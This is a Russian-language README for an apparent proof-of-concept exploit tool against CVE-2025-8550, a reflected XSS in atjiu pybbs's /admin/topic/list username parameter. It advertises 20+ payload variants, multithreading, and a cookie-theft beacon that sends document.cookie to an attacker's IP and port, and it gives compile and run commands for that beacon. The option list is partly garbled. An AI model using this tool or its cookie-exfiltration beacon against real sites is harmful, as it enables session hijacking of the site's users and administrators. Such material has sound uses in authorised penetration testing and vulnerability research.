
Автоматический Proof-of-Concept эксплойт для CVE-2025-8550, отражённый XSS в atjiu pybbs. Возможности: 20+ вариантов полезной нагрузки, эксфильтрация cookie, многопоточность и настраиваемый CLI для тестирования на проникновение.
Этот репозиторий содержит автоматизированный эксплойт Proof-of-Concept (PoC) для CVE-2025-8550, отражённой уязвимости межсайтового скриптинга (XSS) в atjiu pybbs (≤ v6.0.0). Он нацелен на параметр username конечной точки /admin/topic/list, в котором отсутствует корректная санитизация ввода.
20+ вариаций полезной нагрузки: script, SVG, iframe, object, обработчики onerror и другие.
Автоматическое кодирование URL: обеспечивает безопасную инъекцию через curl_easy_escape библиотеки libcurl.
Извлечение cookie (опционально): инъекция маяка для отправки document.cookie на сервер, контролируемый атакующим.
Многопоточность: использует pthreads для распараллеливания попыток и ускорения тестирования.
Настраиваемый CLI: с использованием , поддерживает указание:
argparse-u / --url)-c / --cookies)-k / --cokpay)-i / --ip, -p / --port)-v / --verbose)# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread
# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]
#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
http://<TARGET> на ваш экземпляр atjiu pybbs.-k для включения маяка кражи cookie (требуется -i и -p).-c, если cookie аутентификации не нужны.MIT License